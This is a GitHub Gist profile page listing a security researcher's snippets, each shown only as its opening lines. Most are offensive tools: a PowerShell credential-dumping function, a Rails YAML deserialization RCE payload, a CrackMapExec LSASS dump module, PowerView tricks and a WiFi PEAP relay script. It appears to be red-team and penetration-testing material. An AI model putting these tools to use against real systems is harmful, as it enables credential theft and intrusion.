Skip to content

Instantly share code, notes, and snippets.

View mpgn's full-sized avatar
🕹️
Impose ta chance, serre ton bonheur et va vers ton risque.

mpgn

🕹️
Impose ta chance, serre ton bonheur et va vers ton risque.
1.3k followers · 21 following
View GitHub Profile
@mpgn
mpgn / node.json
Last active December 23, 2018 20:13
{
"nodes": [
{
"id": "Alice"
},
{
"id": "Bob"
},
{
"id": "Carol"
@mpgn
mpgn / Invoke-Mi.txt
Last active January 8, 2019 16:02
function Invoke-Mi
<#
#>
[CmdletBinding(DefaultParameterSetName="DumpCreds")]
Param(
[Parameter(Position = 0)]
[String[]]
$ComputerName,
@mpgn
mpgn / SubtleCrypto.js
Last active May 6, 2024 03:25
SubtleCrypto javascript example
// exemple based on https://github.com/diafygi/webcrypto-examples#rsa-oaep
function importKey() {
return window.crypto.subtle.importKey(
"jwk", //can be "jwk" or "raw"
{ //this is an example jwk key, "raw" would be an ArrayBuffer
kty: "oct",
k: "Y0zt37HgOx-BY7SQjYVmrqhPkO44Ii2Jcb9yydUDPfE",
alg: "A256GCM",
ext: true,
@mpgn
mpgn / railspwn.rb
Created March 18, 2019 21:21 — forked from niklasb/railspwn.rb
Rails 5.1.4 YAML unsafe deserialization RCE payload
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end
class DeprecatedInstanceVariableProxy
@mpgn
mpgn / info.md
Created April 11, 2019 20:44
@mpgn
mpgn / areadme.md
Last active December 6, 2019 17:50
Procdump CME module that dump LSASS process and extract the result with pypykatz
  1. install pypykatz pip install pypykatz outisde your pipenv
  2. Add this file to cme/module/procdump.py
  3. compile python setup.py install
  4. run cme smb 172.16.60.152 -u Administrator -p P@ssword -M procdump

image

@mpgn
mpgn / README.md
Created November 26, 2019 15:12
CrackMapExec module to set as "owned" on BloodHound every target owned by the attacker

Installation

  • Copy bloodhound_owned.py in cme/modules and reinstall CrackMapExec python setup.py install
  • pip install neo4j

Usage

cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M bloodhound_owned
@mpgn
mpgn / PowerView-3.0-tricks.ps1
Created March 29, 2020 16:35 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@mpgn
mpgn / Blackfield vs NetExec .md
Last active April 17, 2024 15:02
Blackfield vs NetExec for fun and profit @mpgn_x64
@mpgn
mpgn / wifi-relay.sh
Created November 2, 2020 11:01 — forked from 1mm0rt41PC/wifi-relay.sh
Wifi easy PEAP relay
#!/bin/bash
# Wifi easy PEAP relay
#
# Author: 1mm0rt41PC - immortal-pc.info - https://github.com/1mm0rt41PC
#
# Ref:
# - https://github.com/sensepost/hostapd-mana
# - https://github.com/sensepost/wpa_sycophant
# - https://sensepost.com/blog/2019/peap-relay-attacks-with-wpa_sycophant/
# - https://www.youtube.com/watch?v=eYsGyvGxlpI&feature=youtu.be&t=1052